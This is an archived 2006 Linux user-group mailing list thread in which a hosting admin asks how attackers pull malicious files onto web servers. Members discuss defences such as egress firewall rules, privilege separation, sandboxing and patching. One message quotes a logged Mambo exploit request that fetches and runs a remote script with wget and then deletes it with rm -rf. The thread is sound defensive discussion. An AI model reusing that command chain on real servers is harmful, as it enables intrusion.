Re: [SLUG] d/l illicit files: wget, curl, what else ?
On Sat, September 30, 2006 7:40 am, Zhasper wrote: On 9/29/06, Voytek Eymont [EMAIL PROTECTED] wrote: Eeep! You're close, only off by three years: http://www.auscert.org.au/render.html?it=3689 Red Hat Linux 7.1, 7.2, 7.3, and 8.0 distributions will reach their end-of-life for errata maintenance on the 31st December 2003. This means yes, but it was picked up by the fedora organization: Maintenance Mode Fedora Releases We are currently maintaining Red Hat Linux 7.3 and 9 as well as Fedora Core 3 and 4 as these have been transferred into maintenance mode from Fedora Core. We will provide updates for these releases for as long as there is community interest though we in general follow the 1-2-3 and out policy. This provides an effective supported lifetime (Fedora Core plus Fedora Legacy Support) of approximately 1.5 years or even more. -- Voytek -- SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/ Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html
Re: [SLUG] d/l illicit files: wget, curl, what else ?
On Thu, September 28, 2006 8:40 am, Erik de Castro Lopo wrote: On Thu, 28 Sep 2006 08:33:47 +1000 (EST) Voytek Eymont [EMAIL PROTECTED] wrote: No. it won't. You need to run this in a chroot jail or a User Mode Linux or something like that. You would be better off making sure your machine is running a current version of your chosen distro (what are you running btw?) and then exploring chroot/UML/Xen/whatever solutions. thanks, Erik RH7.3 I suspect some of the solutions discussed might not be avaliable for it... -- Voytek -- SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/ Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html
Re: [SLUG] d/l illicit files: wget, curl, what else ?
On Thu, September 28, 2006 8:42 am, Zhasper wrote: On 9/28/06, Voytek Eymont [EMAIL PROTECTED] wrote: I'd suggest that a more effective strategy might be to talk to your users; tell them what you've found, why it's unacceptable, and what action you'll be taking if you discover anything similar in future. Also make it clear to them how they can check things with you before they install, and be proactive in helping them find solutions that don't compromise your security - for instance, sticking phpmyadmin behind a .htaccess file. thanks, Zhasper yes, I will, clearly, I need to spell it out, it's obvious I overestimated users' grasp of security, etc., or, in fact, his ability to understand what's good and proper: a php shell script the user installed had clear warning 'do not place this on your server without admin's permission' -- Voytek -- SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/ Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html
Re: [SLUG] d/l illicit files: wget, curl, what else ?
On Thu, September 28, 2006 10:32 am, Matthew Hannigan wrote: On Thu, Sep 28, 2006 at 08:40:38AM +1000, Erik de Castro Lopo wrote: I wonder if the best bang for buck is perhaps just have a iptables rule to prevent outgoing connections for the user running apache. Matt, thanks this seems like a worthwhile option... is it ? -- Voytek -- SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/ Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html
Re: [SLUG] d/l illicit files: wget, curl, what else ?
On Thu, September 28, 2006 11:45 am, Jamie Wilkinson wrote: This one time, at band camp, Erik de Castro Lopo wrote: You can add yourself the overhead of Xen for a shared hosting environment, but it's not necessary when you take the time to use a simple privilege separation technique, e.g. mod_suexec. -- is there anything like it for Apache 1.3x ? -- Voytek -- SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/ Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html
Re: [SLUG] d/l illicit files: wget, curl, what else ?
On Fri, September 29, 2006 11:02 pm, Erik de Castro Lopo wrote: You mean like up-to-date security patches? :-) I thought they're doing it till end of this year for 7.3...? -- Voytek -- SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/ Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html
Re: [SLUG] d/l illicit files: wget, curl, what else ?
Voytek Eymont wrote: On Thu, September 28, 2006 8:40 am, Erik de Castro Lopo wrote: You would be better off making sure your machine is running a current version of your chosen distro (what are you running btw?) thanks, Erik RH7.3 I suspect some of the solutions discussed might not be avaliable for it... You mean like up-to-date security patches? :-) Erik -- +---+ Erik de Castro Lopo +---+ Microsoft, and other companies with shoddy security, . -- Bruce Schneier, cryto-guru, to a US Senate committee. -- SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/ Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html
Re: [SLUG] d/l illicit files: wget, curl, what else ?
On 9/29/06, Voytek Eymont [EMAIL PROTECTED] wrote: On Fri, September 29, 2006 11:02 pm, Erik de Castro Lopo wrote: You mean like up-to-date security patches? :-)I thought they're doing it till end of this year for 7.3...? Eeep! You're close, only off by three years:http://www.auscert.org.au/render.html?it=3689 Red Hat Linux 7.1, 7.2, 7.3, and 8.0 distributions will reach theirend-of-life for errata maintenance on the 31st December 2003. This meansthat from 1st January 2004 we will not be producing new security, bugfix, or enhancement updates for these products. Red Hat Linux 9 reaches end of life on April 30, 2004.-- There is nothing more worthy of contempt than a man who quotes himself - Zhasper, 2004 -- SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/ Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html
Re: [SLUG] d/l illicit files: wget, curl, what else ?
Voytek Eymont wrote: apart from wget and curl, what else can be used to download illicit files to a web server ? Python, Perl, Ruby, C, Haskell, Ocaml. In fact any programming language. Also programs like lynx. Erik -- +---+ Erik de Castro Lopo +---+ There is no reason why anyone would want a computer in their home Ken Olson, DEC, 1977 -- SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/ Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html
Re: [SLUG] d/l illicit files: wget, curl, what else ?
On Wed, Sep 27, 2006 at 08:54:04PM +1000, Voytek Eymont wrote: apart from wget and curl, what else can be used to download illicit files to a web server ? what other stuff should I look for in the web logs ? from web log: GET /index.php?_REQUEST[option]=com_content_REQUEST[Itemid]=1GLOBALS=mosConfig_absolute_path=http://www.sohbetbitanem.com/tool.gif?cmd=cd%20/tmp/;wget%20http://www.sohbetbitanem.com/mambo.txt;mambo%20mambo.txt;rm%20-rf%20mambo.*? HTTP/1.0 200 167 - Mozilla/5.0 This web request appears to be an attempt to exploit a vulnerability in a CMS called Mambo. The top hit on google for mosConfig_absolute_path is: http://secunia.com/advisories/14337. See also http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0512. It's probably just an automated attempt to find and exploit hosts with the vulnerable version of Mambo. If you don't have a vulnerable version of Mambo installed on your server, then you probably don't have anything to worry about. -Andrew. -- SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/ Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html
Re: [SLUG] d/l illicit files: wget, curl, what else ?
On Wed, September 27, 2006 9:15 pm, Erik de Castro Lopo wrote: apart from wget and curl, what else can be used to download illicit files to a web server ? Python, Perl, Ruby, C, Haskell, Ocaml. In fact any programming language. Also programs like lynx. Eric, I guess I meant 'single-purpose utilities that can be easily expoited like so' : 'some_app file_url' through a web server vulnerability to easily deposit exploits I'm guessing that if I do NOT have wget/curl/lynx/links available, next time a cms has such an expoitable hole, I'll reduce my exposure, no ?? if I remove or rename wget/curl/lynx/links from my server, apart from ocassional inconvience to me, that won't cause me issues ? -- Voytek -- SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/ Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html
Re: [SLUG] d/l illicit files: wget, curl, what else ?
On Thu, September 28, 2006 12:18 am, Andrew Bennetts wrote: This web request appears to be an attempt to exploit a vulnerability in a CMS called Mambo. The top hit on google for mosConfig_absolute_path is: http://secunia.com/advisories/14337. See also http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0512. It's probably just an automated attempt to find and exploit hosts with the vulnerable version of Mambo. If you don't have a vulnerable version of Mambo installed on your server, then you probably don't have anything to worry about. thanks, Andrew unfortuantly, it seems my user does have vulnerable version of Joomla... clearly he is not following Mambo/Joomla advisories... I know little of Mambo/Joomla, any idea how can I find out level of installed version ? -- Voytek -- SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/ Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html
Re: [SLUG] d/l illicit files: wget, curl, what else ?
On Thu, 28 Sep 2006 08:33:47 +1000 (EST) Voytek Eymont [EMAIL PROTECTED] wrote: Eric, Who's this Eric guy? :-) I guess I meant 'single-purpose utilities that can be easily expoited like so' : 'some_app file_url' through a web server vulnerability to easily deposit exploits In Perl, Python and Ruby writing a simple app that does what wget does is no more than 10 lines of really trivial code. I'm guessing that if I do NOT have wget/curl/lynx/links available, next time a cms has such an expoitable hole, I'll reduce my exposure, no ?? No. it won't. You need to run this in a chroot jail or a User Mode Linux or something like that. if I remove or rename wget/curl/lynx/links from my server, apart from ocassional inconvience to me, that won't cause me issues ? Its goes such a small way to solving the problem that its probably not worth it. You would be better off making sure your machine is running a current version of your chosen distro (what are you running btw?) and then exploring chroot/UML/Xen/whatever solutions. Erik +---+ Erik de Castro Lopo +---+ Microsoft is finally bringing all of its Windows operating system families under one roof. It will combine all of the features of CE, stability and support of ME and the speed of NT. It will be called Windows CEMENT... -- SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/ Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html
Re: [SLUG] d/l illicit files: wget, curl, what else ?
On 9/28/06, Voytek Eymont [EMAIL PROTECTED] wrote: On Wed, September 27, 2006 9:15 pm, Erik de Castro Lopo wrote: apart from wget and curl, what else can be used to download illicit files to a web server ? Python, Perl, Ruby, C, Haskell, Ocaml. In fact any programming language. Also programs like lynx.Eric,I guess I meant 'single-purpose utilities that can be easily expoited likeso' :'some_app file_url'through a web server vulnerability to easily deposit exploits I'm guessing that if I do NOT have wget/curl/lynx/links available, nexttimea cms has such an expoitable hole, I'll reduce my exposure, no ??I would think that depended entirely on the exploitable hole; even if you get rid of those utilities, there will be ways within perl/php/language-of-choice to download things; if the exploitable hole makes those available, you're no better off for having removed those utilities. if I remove or rename wget/curl/lynx/links from my server, apart fromocassional inconvience to me, that won't cause me issues ? I think it would cause more inconvenience than you realise. I'm not sure what Apt or up2date use, but I know that utilities such as CPAN will try to use wget/curl/links/lynx in order to download updates; you'll probably find that a lot of other systems that have the ability to look for updates do as well. Essentially, I think you're making the same mistake here that Bruce Schneier writes about airline security people making all the time: you're reacting specifically to one attack vector that you've seen in the past, which means that that vector won't be successful again. You're not doing anything to prevent different vectors from being detected or prevented though. I'd suggest that a more effective strategy might be to talk to your users; tell them what you've found, why it's unacceptable, and what action you'll be taking if you discover anything similar in future. Also make it clear to them how they can check things with you before they install, and be proactive in helping them find solutions that don't compromise your security - for instance, sticking phpmyadmin behind a .htaccess file. --Voytek--SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html-- There is nothing more worthy of contempt than a man who quotes himself - Zhasper, 2004 -- SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/ Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html
Re: [SLUG] d/l illicit files: wget, curl, what else ?
Voytek Eymont wrote: thanks, Andrew unfortuantly, it seems my user does have vulnerable version of Joomla... clearly he is not following Mambo/Joomla advisories... If you allow your users to install their own versions of X, then your distribution's patching mechanism is bypassed and you have no way of easily keeping up to date with patches. One way of dealing with this is to make each user run in a chroot/UML/Xen/whatever instance so that when their environment is compromised it only affects them and not everyone else on the machine. Erik -- +---+ Erik de Castro Lopo +---+ Hundreds of thousands of people couldn't care less about Kylix and what it runs on. It's there for the dying breed of die-hard Pascal fanatics who missed their 20 year window to migrate to C and C++. -- Kaz Kylheku in comp.os.linux.development.apps -- SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/ Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html
Re: [SLUG] d/l illicit files: wget, curl, what else ?
On Thu, Sep 28, 2006 at 08:40:38AM +1000, Erik de Castro Lopo wrote: [ .. ] if I remove or rename wget/curl/lynx/links from my server, apart from ocassional inconvience to me, that won't cause me issues ? Its goes such a small way to solving the problem that its probably not worth it. You would be better off making sure your machine is running a current version of your chosen distro (what are you running btw?) and then exploring chroot/UML/Xen/whatever solutions. I wonder if the best bang for buck is perhaps just have a iptables rule to prevent outgoing connections for the user running apache. Or will this potentially kill those new fancy schmancy ajax/web2 apps. Matt -- SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/ Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html
Re: [SLUG] d/l illicit files: wget, curl, what else ?
On 9/28/06, Matthew Hannigan [EMAIL PROTECTED] wrote: I wonder if the best bang for buck is perhaps just have a iptablesrule to prevent outgoing connections for the user running apache.Or will this potentially kill those new fancy schmancy ajax/web2 apps. It won't kill anything ajaxified, as those things still rely on the browser opening connections to the server.-- There is nothing more worthy of contempt than a man who quotes himself - Zhasper, 2004 -- SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/ Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html
Re: [SLUG] d/l illicit files: wget, curl, what else ?
On Thu, September 28, 2006 8:42 am, Zhasper wrote: On 9/28/06, Voytek Eymont [EMAIL PROTECTED] wrote: Essentially, I think you're making the same mistake here that Bruce Schneier writes about airline security people making all the time: you're reacting specifically to one attack vector that you've seen in the past, which means that that vector won't be successful again. You're not doing anything to prevent different vectors from being detected or prevented though. yes, I realize that, though, i feel it's still better to 'do something' I'd suggest that a more effective strategy might be to talk to your users; tell them what you've found, why it's unacceptable, and what action you'll be taking if you discover anything similar in future. Also make it clear to them how they can check things with you before they install, and be proactive in helping them find solutions that don't compromise your security - for instance, sticking phpmyadmin behind a .htaccess file. yes, of course, though, it's clear this user's apparent skills don't extend to security consideration... -- Voytek -- SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/ Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html
Re: [SLUG] d/l illicit files: wget, curl, what else ?
This one time, at band camp, Voytek Eymont wrote: On Wed, September 27, 2006 9:15 pm, Erik de Castro Lopo wrote: apart from wget and curl, what else can be used to download illicit files to a web server ? Python, Perl, Ruby, C, Haskell, Ocaml. In fact any programming language. Also programs like lynx. Eric, I guess I meant 'single-purpose utilities that can be easily expoited like so' : 'some_app file_url' through a web server vulnerability to easily deposit exploits I'm guessing that if I do NOT have wget/curl/lynx/links available, next time a cms has such an expoitable hole, I'll reduce my exposure, no ?? perl -MLWP -e 'GET url' or somesuch :) You want to remove perl too? Configuring apache to run the potentially vulnerable code in a security domain with minimum rights is going to let you sleep better than removing random tools. Sure, minimise the options an attacker has, defense in depth and all that. Start at the bottom of the network stack and start securing yourself from there, then up through the application layer, then once you're inside the application itself, partition execution contexts so that the stuff you don't trust (i.e. the CMS) when hacked doesn't have the opportunity to damage your system, then they'll pop up like sore thumbs when it does happen, and make for easier analysis of attack vector. -- SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/ Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html
Re: [SLUG] d/l illicit files: wget, curl, what else ?
This one time, at band camp, Erik de Castro Lopo wrote: Voytek Eymont wrote: thanks, Andrew unfortuantly, it seems my user does have vulnerable version of Joomla... clearly he is not following Mambo/Joomla advisories... If you allow your users to install their own versions of X, then your distribution's patching mechanism is bypassed and you have no way of easily keeping up to date with patches. One way of dealing with this is to make each user run in a chroot/UML/Xen/whatever instance so that when their environment is compromised it only affects them and not everyone else on the machine. chroot/UML/Xen is not the hammer for this screw :) Anchor has survived for 6 years without a root compromise, allowing customers to install their own buggy unpatched versions of code, and all running on an unvirtualised machine. You can add yourself the overhead of Xen for a shared hosting environment, but it's not necessary when you take the time to use a simple privilege separation technique, e.g. mod_suexec. -- SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/ Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html
Re: [SLUG] d/l illicit files: wget, curl, what else ?
On 28 Sep 2006, Jamie Wilkinson [EMAIL PROTECTED] wrote: This one time, at band camp, Voytek Eymont wrote: On Wed, September 27, 2006 9:15 pm, Erik de Castro Lopo wrote: apart from wget and curl, what else can be used to download illicit files to a web server ? Python, Perl, Ruby, C, Haskell, Ocaml. In fact any programming language. Also programs like lynx. Eric, I guess I meant 'single-purpose utilities that can be easily expoited like so' : 'some_app file_url' through a web server vulnerability to easily deposit exploits I'm guessing that if I do NOT have wget/curl/lynx/links available, next time a cms has such an expoitable hole, I'll reduce my exposure, no ?? Voytek, Perhaps it's just me but I don't understand *where* and *by whom* you are trying to prevent them being executed. You can't (obviously) control what is run by random people on the internet who are attacking your machine. You can try to filter by the User-Agent string to block requests from those programs, but that is trivial to spoof, and regularly spoofed by attack tools. See e.g. http://www.metasploit.com/ If an attacker has control of your machine you have more serious problems than whether they can run wget or not. Similarly if your users are running vulnerable software you should just fix that rather than worrying about wget... perl -MLWP -e 'GET url' or somesuch :) You want to remove perl too? And in php something like open('http://ubuntu.com/') may work too, depending on the configuration. -- Martin -- SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/ Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html
Re: [SLUG] d/l illicit files: wget, curl, what else ?
On Thu, Sep 28, 2006 at 11:45:17AM +1000, Jamie Wilkinson wrote: You can add yourself the overhead of Xen for a shared hosting environment, but it's not necessary when you take the time to use a simple privilege separation technique, e.g. mod_suexec. Speaking of mods, http://www.modsecurity.org/ might well prevent a lot of badness. I don't know whether the administration involved in a complex isp hosting situation would be worth it though. (me googles) in http://www.cerias.purdue.edu/weblogs/coj/secure-it-practices/post-37/ Ed Finkler says: mod_security is an essential tool for securing any apache-based hosting environment So who am I to argue :-) FWIW, there's also a post on this Mambo/Joomla worm: http://www.cerias.purdue.edu/weblogs/coj/infosec-education/post-11/ Matt -- SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/ Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html